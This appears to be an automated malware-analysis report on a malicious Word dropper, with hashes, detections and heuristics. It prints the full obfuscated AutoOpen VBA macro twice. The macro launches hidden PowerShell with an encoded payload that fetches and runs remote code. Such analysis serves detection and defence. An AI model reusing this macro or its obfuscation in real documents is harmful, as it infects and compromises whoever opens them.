Office (OLE) malware analysis — malicious · f76e67860a094543

MALICIOUS

Office (OLE)

269.0 KB Created: 2018-02-27 16:13:00 Authoring application: Microsoft Office Word First seen: 2018-07-08

MD5: c963e50beec751108075c4974b1eb785 SHA-1: 2cf6d302ec409fb9d15f2de44148cb483b3d1377 SHA-256: f76e67860a09454333719ff1c5078028bb17ac48921dbaf94cbf5a9a1cdce7bb

170 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call, indicating an attempt to execute external commands. The ClamAV detection name 'Doc.Dropper.Agent-6460481-0' further supports its nature as a dropper. The macro's obfuscated string concatenation suggests it is preparing to download and execute a secondary payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6460481-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6460481-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Matched line in script
```
    IN_PA = IN_PA + JP_NF
    Shell$ IN_PA
End Sub
```

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Name = "cherrycoke"
Sub AutoOpen()
    Dim IN_PA As String

Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6164 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6164 bytes
SHA-256: `e2619aedabeaa521ad516c8d0dfa1bf4fb311876037e9a442bb04ff61695c9d9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "cherrycoke" Sub AutoOpen() Dim IN_PA As String JT_QH = Array(" ", "e", "o", "t", "s", "a", "r", "x", "l", "p", "n", "-", "u", "c", "b", "h", "y", "d", "i", "w") Dim DS_QF As String DS_QF = "ZgB1AG4AYwB0" IN_PA = IN_PA + JT_QH(9) IN_PA = IN_PA + JT_QH(2) Dim IT_LI As String IT_LI = "AGkAbwBuACAAYQAoACQ" IN_PA = IN_PA + JT_QH(19) IN_PA = IN_PA + JT_QH(1) Dim FS_TJ As String FS_TJ = "AeAApAHsAcgBlAHQAdQByAG4A" IN_PA = IN_PA + JT_QH(6) IN_PA = IN_PA + JT_QH(4) Dim AN_QJ As String AN_QJ = "IABbAFMAeQBzAHQAZQBt" IN_PA = IN_PA + JT_QH(15) IN_PA = IN_PA + JT_QH(1) Dim GM_LI As String GM_LI = "AC4AVABlAHgAdAAuAEUAbgBjAG8AZABpA" JP_NF = JP_NF & DS_QF & IT_LI & FS_TJ & AN_QJ & GM_LI IN_PA = IN_PA + JT_QH(8) IN_PA = IN_PA + JT_QH(8) Dim HT_MD As String HT_MD = "G4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuA" IN_PA = IN_PA + JT_QH(0) IN_PA = IN_PA + JT_QH(11) Dim CN_LF As String CN_LF = "GcAKABbAFMAeQBzAHQAZQ" IN_PA = IN_PA + JT_QH(19) IN_PA = IN_PA + JT_QH(18) Dim BR_MI As String BR_MI = "BtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwB" IN_PA = IN_PA + JT_QH(10) IN_PA = IN_PA + JT_QH(17) Dim AQ_NB As String AQ_NB = "tAEIAYQBzAGUANgA0AFMAdAByAGkAbg" IN_PA = IN_PA + JT_QH(2) IN_PA = IN_PA + JT_QH(19) Dim GK_NE As String GK_NE = "BnACgAJAB4ACkAKQB9ADsAaQ" JP_NF = JP_NF & HT_MD & CN_LF & BR_MI & AQ_NB & GK_NE IN_PA = IN_PA + JT_QH(4) IN_PA = IN_PA + JT_QH(3) Dim BM_OD As String BM_OD = "BlAHgAIAAkACgAYQAgACQAKAAkACgAJA" IN_PA = IN_PA + JT_QH(16) IN_PA = IN_PA + JT_QH(8) Dim GO_SI As String GO_SI = "AoAGkAbgB2AG8AawBlAC0AdwBlAGIAc" IN_PA = IN_PA + JT_QH(1) IN_PA = IN_PA + JT_QH(0) Dim AQ_KJ As String AQ_KJ = "gBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABzADoALwAvAHUA" IN_PA = IN_PA + JT_QH(15) IN_PA = IN_PA + JT_QH(18) Dim AS_TJ As String AS_TJ = "cwBwAHIAZAA1ADEANQ" IN_PA = IN_PA + JT_QH(17) IN_PA = IN_PA + JT_QH(17) Dim DT_LF As String DT_LF = "AwAGMAZQBuA" JP_NF = JP_NF & BM_OD & GO_SI & AQ_KJ & AS_TJ & DT_LF IN_PA = IN_PA + JT_QH(1) IN_PA = IN_PA + JT_QH(10) Dim IO_SH As String IO_SH = "HQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4Adw" IN_PA = IN_PA + JT_QH(0) IN_PA = IN_PA + JT_QH(11) Dim HN_SI As String HN_SI = "BpAG4AZ" IN_PA = IN_PA + JT_QH(1) IN_PA = IN_PA + JT_QH(7) Dim IM_NI As String IM_NI = "ABvAHcAcwAuAG4AZQB0AC8AdwBhAHI" IN_PA = IN_PA + JT_QH(1) IN_PA = IN_PA + JT_QH(13) Dim HS_KF As String HS_KF = "AZQBoAG8AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AUABhAH" IN_PA = IN_PA + JT_QH(12) IN_PA = IN_PA + JT_QH(3) Dim HR_KI As String HR_KI = "IAdABpAHQAaQBvAG4ASwBlAHkAJQAyADAAZ" JP_NF = JP_NF & IO_SH & HN_SI & IM_NI & HS_KF & HR_KI IN_PA = IN_PA + JT_QH(18) IN_PA = IN_PA + JT_QH(2) Dim FR_LD As String FR_LD = "QBxACUAMgAwACUAMgA3AHMA" IN_PA = IN_PA + JT_QH(10) IN_PA = IN_PA + JT_QH(9) Dim DR_NI As String DR_NI = "dABhAGcAZQAlADIANwAmACQAUwBlAGwAZQ" IN_PA = IN_PA + JT_QH(2) IN_PA = IN_PA + JT_QH(8) Dim CL_LG As String CL_LG = "BjAHQAPQBkAGEAdABhACYAc" IN_PA = IN_PA + JT_QH(18) IN_PA = IN_PA + JT_QH(13) Dim EP_LH As String EP_LH = "wB2AD0AMgAwADEAN" IN_PA = IN_PA + JT_QH(16) IN_PA = IN_PA + JT_QH(0) Dim FT_NF As String FT_NF = "wAtADAANAAtADEANwAmAHMAcwA9AGIAZgBxA" JP_NF = JP_NF & FR_LD & DR_NI & CL_LG & EP_LH & FT_NF IN_PA = IN_PA + JT_QH(14) IN_PA = IN_PA + JT_QH(16) Dim DT_MC As String DT_MC = "HQAJgBz" IN_PA = IN_PA + JT_QH(9) IN_PA = IN_PA + JT_QH(5) Dim HR_MB As String HR_MB = "AHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AGQAbABhA" IN_PA = IN_PA + JT_QH(4) IN_PA = IN_PA + JT_QH(4) Dim ET_NJ As String ET_NJ = "GMAdQBwACYAcwBlAD0AMgAwADEANwAtADEAMA" IN_PA = IN_PA + JT_QH(0) IN_PA = IN_PA + JT_QH(11) Dim EL_OA As String EL_OA = "AtADAANgBUADIAMgA6ADQAMQA6ADEAMgBaACYAcwB" IN_PA = IN_PA + JT_QH(1) IN_PA = IN_PA + JT_QH(0) Dim JS_SD As String JS_SD = "0AD0AMgAwADEANwAtADAAOQAtADIAOABUADEANAA6ADQAMQA6A" JP_NF = JP_NF & DT_MC & HR_MB & ET_NJ & EL_OA & JS_SD Dim FL_PE As String FL_PE = "DEAMgBaACYA" Dim EK_OC As String EK_OC = "cwBwAHIAPQBoAHQAd" Dim FS_KJ As String FS_KJ = "ABwAHMAJgBzAGkAZwA9AHQA" Dim EP_NH As String EP_NH = "egBQADcAYwA4AHgAWgBoAH" Dim FO_ND As String FO_ND = "IAMQBzAGIAdgB4ADkAZgBKAFMAdwBKAEkAU" JP_NF = JP_NF & FL_PE & EK_OC & FS_KJ & EP_NH & FO_ND Dim FN_LG As String FN_LG = "wBIAEIANgBlADgAJQAyAEI" Dim DQ_TG As String DQ_TG = "AbgBsAGwAdQBuAEgAaQBmAEwAMwBoAH" Dim AM_LI As String AM_LI = "gAagA0ACUAMwB" Dim HO_LC As String HO_LC = "EACcAIAAtAEgAZQB" Dim GP_TI As String GP_TI = "hAGQAZQByAHMAIABAAHsAJwB" JP_NF = JP_NF & FN_LG & DQ_TG & AM_LI & HO_LC & GP_TI Dim FS_TA As String FS_TA = "BAGMAYwBlAHAAdAAn" Dim JP_ND As String JP_ND = "AD0AJwBBAHA" Dim DQ_RJ As String DQ_RJ = "AcABsAGkAYwBh" Dim FL_SJ As String FL_SJ = "AHQAaQBvAG4ALwBKAFMATwBOAC" Dim BP_KE As String BP_KE = "cAfQApAC4AQwBvAG4AdABlAG4AdAAgAHw" JP_NF = JP_NF & FS_TA & JP_ND & DQ_RJ & FL_SJ & BP_KE Dim FT_LG As String FT_LG = "AIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBK" JP_NF = JP_NF & FT_LG Dim CN_MF As String CN_MF = "AHMAbwBuACkALgB2AGEAbAB1AGUALgBkAGEAdABhAC" JP_NF = JP_NF & CN_MF Dim HR_RB As String HR_RB = "kAKQA=" JP_NF = JP_NF & HR_RB IN_PA = IN_PA + JP_NF Shell$ IN_PA End Sub

SHA-256: e2619aedabeaa521ad516c8d0dfa1bf4fb311876037e9a442bb04ff61695c9d9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cherrycoke"
Sub AutoOpen()
    Dim IN_PA As String
    JT_QH = Array(" ", "e", "o", "t", "s", "a", "r", "x", "l", "p", "n", "-", "u", "c", "b", "h", "y", "d", "i", "w")
    Dim DS_QF As String
    DS_QF = "ZgB1AG4AYwB0"
    IN_PA = IN_PA + JT_QH(9)
    IN_PA = IN_PA + JT_QH(2)
    Dim IT_LI As String
    IT_LI = "AGkAbwBuACAAYQAoACQ"
    IN_PA = IN_PA + JT_QH(19)
    IN_PA = IN_PA + JT_QH(1)
    Dim FS_TJ As String
    FS_TJ = "AeAApAHsAcgBlAHQAdQByAG4A"
    IN_PA = IN_PA + JT_QH(6)
    IN_PA = IN_PA + JT_QH(4)
    Dim AN_QJ As String
    AN_QJ = "IABbAFMAeQBzAHQAZQBt"
    IN_PA = IN_PA + JT_QH(15)
    IN_PA = IN_PA + JT_QH(1)
    Dim GM_LI As String
    GM_LI = "AC4AVABlAHgAdAAuAEUAbgBjAG8AZABpA"
    JP_NF = JP_NF & DS_QF & IT_LI & FS_TJ & AN_QJ & GM_LI
    IN_PA = IN_PA + JT_QH(8)
    IN_PA = IN_PA + JT_QH(8)
    Dim HT_MD As String
    HT_MD = "G4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuA"
    IN_PA = IN_PA + JT_QH(0)
    IN_PA = IN_PA + JT_QH(11)
    Dim CN_LF As String
    CN_LF = "GcAKABbAFMAeQBzAHQAZQ"
    IN_PA = IN_PA + JT_QH(19)
    IN_PA = IN_PA + JT_QH(18)
    Dim BR_MI As String
    BR_MI = "BtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwB"
    IN_PA = IN_PA + JT_QH(10)
    IN_PA = IN_PA + JT_QH(17)
    Dim AQ_NB As String
    AQ_NB = "tAEIAYQBzAGUANgA0AFMAdAByAGkAbg"
    IN_PA = IN_PA + JT_QH(2)
    IN_PA = IN_PA + JT_QH(19)
    Dim GK_NE As String
    GK_NE = "BnACgAJAB4ACkAKQB9ADsAaQ"
    JP_NF = JP_NF & HT_MD & CN_LF & BR_MI & AQ_NB & GK_NE
    IN_PA = IN_PA + JT_QH(4)
    IN_PA = IN_PA + JT_QH(3)
    Dim BM_OD As String
    BM_OD = "BlAHgAIAAkACgAYQAgACQAKAAkACgAJA"
    IN_PA = IN_PA + JT_QH(16)
    IN_PA = IN_PA + JT_QH(8)
    Dim GO_SI As String
    GO_SI = "AoAGkAbgB2AG8AawBlAC0AdwBlAGIAc"
    IN_PA = IN_PA + JT_QH(1)
    IN_PA = IN_PA + JT_QH(0)
    Dim AQ_KJ As String
    AQ_KJ = "gBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABzADoALwAvAHUA"
    IN_PA = IN_PA + JT_QH(15)
    IN_PA = IN_PA + JT_QH(18)
    Dim AS_TJ As String
    AS_TJ = "cwBwAHIAZAA1ADEANQ"
    IN_PA = IN_PA + JT_QH(17)
    IN_PA = IN_PA + JT_QH(17)
    Dim DT_LF As String
    DT_LF = "AwAGMAZQBuA"
    JP_NF = JP_NF & BM_OD & GO_SI & AQ_KJ & AS_TJ & DT_LF
    IN_PA = IN_PA + JT_QH(1)
    IN_PA = IN_PA + JT_QH(10)
    Dim IO_SH As String
    IO_SH = "HQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4Adw"
    IN_PA = IN_PA + JT_QH(0)
    IN_PA = IN_PA + JT_QH(11)
    Dim HN_SI As String
    HN_SI = "BpAG4AZ"
    IN_PA = IN_PA + JT_QH(1)
    IN_PA = IN_PA + JT_QH(7)
    Dim IM_NI As String
    IM_NI = "ABvAHcAcwAuAG4AZQB0AC8AdwBhAHI"
    IN_PA = IN_PA + JT_QH(1)
    IN_PA = IN_PA + JT_QH(13)
    Dim HS_KF As String
    HS_KF = "AZQBoAG8AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AUABhAH"
    IN_PA = IN_PA + JT_QH(12)
    IN_PA = IN_PA + JT_QH(3)
    Dim HR_KI As String
    HR_KI = "IAdABpAHQAaQBvAG4ASwBlAHkAJQAyADAAZ"
    JP_NF = JP_NF & IO_SH & HN_SI & IM_NI & HS_KF & HR_KI
    IN_PA = IN_PA + JT_QH(18)
    IN_PA = IN_PA + JT_QH(2)
    Dim FR_LD As String
    FR_LD = "QBxACUAMgAwACUAMgA3AHMA"
    IN_PA = IN_PA + JT_QH(10)
    IN_PA = IN_PA + JT_QH(9)
    Dim DR_NI As String
    DR_NI = "dABhAGcAZQAlADIANwAmACQAUwBlAGwAZQ"
    IN_PA = IN_PA + JT_QH(2)
    IN_PA = IN_PA + JT_QH(8)
    Dim CL_LG As String
    CL_LG = "BjAHQAPQBkAGEAdABhACYAc"
    IN_PA = IN_PA + JT_QH(18)
    IN_PA = IN_PA + JT_QH(13)
    Dim EP_LH As String
    EP_LH = "wB2AD0AMgAwADEAN"
    IN_PA = IN_PA + JT_QH(16)
    IN_PA = IN_PA + JT_QH(0)
    Dim FT_NF As String
    FT_NF = "wAtADAANAAtADEANwAmAHMAcwA9AGIAZgBxA"
    JP_NF = JP_NF & FR_LD & DR_NI & CL_LG & EP_LH & FT_NF
    IN_PA = IN_PA + JT_QH(14)
    IN_PA = IN_PA + JT_QH(16)
    Dim DT_MC As String
    DT_MC = "HQAJgBz"
    IN_PA = IN_PA + JT_QH(9)
    IN_PA = IN_PA + JT_QH(5)
    Dim HR_MB As String
    HR_MB = "AHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AGQAbABhA"
    IN_PA = IN_PA + JT_QH(4)
    IN_PA = IN_PA + JT_QH(4)
    Dim ET_NJ As String
    ET_NJ = "GMAdQBwACYAcwBlAD0AMgAwADEANwAtADEAMA"
    IN_PA = IN_PA + JT_QH(0)
    IN_PA = IN_PA + JT_QH(11)
    Dim EL_OA As String
    EL_OA = "AtADAANgBUADIAMgA6ADQAMQA6ADEAMgBaACYAcwB"
    IN_PA = IN_PA + JT_QH(1)
    IN_PA = IN_PA + JT_QH(0)
    Dim JS_SD As String
    JS_SD = "0AD0AMgAwADEANwAtADAAOQAtADIAOABUADEANAA6ADQAMQA6A"
    JP_NF = JP_NF & DT_MC & HR_MB & ET_NJ & EL_OA & JS_SD
    Dim FL_PE As String
    FL_PE = "DEAMgBaACYA"
    Dim EK_OC As String
    EK_OC = "cwBwAHIAPQBoAHQAd"
    Dim FS_KJ As String
    FS_KJ = "ABwAHMAJgBzAGkAZwA9AHQA"
    Dim EP_NH As String
    EP_NH = "egBQADcAYwA4AHgAWgBoAH"
    Dim FO_ND As String
    FO_ND = "IAMQBzAGIAdgB4ADkAZgBKAFMAdwBKAEkAU"
    JP_NF = JP_NF & FL_PE & EK_OC & FS_KJ & EP_NH & FO_ND
    Dim FN_LG As String
    FN_LG = "wBIAEIANgBlADgAJQAyAEI"
    Dim DQ_TG As String
    DQ_TG = "AbgBsAGwAdQBuAEgAaQBmAEwAMwBoAH"
    Dim AM_LI As String
    AM_LI = "gAagA0ACUAMwB"
    Dim HO_LC As String
    HO_LC = "EACcAIAAtAEgAZQB"
    Dim GP_TI As String
    GP_TI = "hAGQAZQByAHMAIABAAHsAJwB"
    JP_NF = JP_NF & FN_LG & DQ_TG & AM_LI & HO_LC & GP_TI
    Dim FS_TA As String
    FS_TA = "BAGMAYwBlAHAAdAAn"
    Dim JP_ND As String
    JP_ND = "AD0AJwBBAHA"
    Dim DQ_RJ As String
    DQ_RJ = "AcABsAGkAYwBh"
    Dim FL_SJ As String
    FL_SJ = "AHQAaQBvAG4ALwBKAFMATwBOAC"
    Dim BP_KE As String
    BP_KE = "cAfQApAC4AQwBvAG4AdABlAG4AdAAgAHw"
    JP_NF = JP_NF & FS_TA & JP_ND & DQ_RJ & FL_SJ & BP_KE
    Dim FT_LG As String
    FT_LG = "AIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBK"
    JP_NF = JP_NF & FT_LG
    Dim CN_MF As String
    CN_MF = "AHMAbwBuACkALgB2AGEAbAB1AGUALgBkAGEAdABhAC"
    JP_NF = JP_NF & CN_MF
    Dim HR_RB As String
    HR_RB = "kAKQA="
    JP_NF = JP_NF & HR_RB
    IN_PA = IN_PA + JP_NF
    Shell$ IN_PA
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.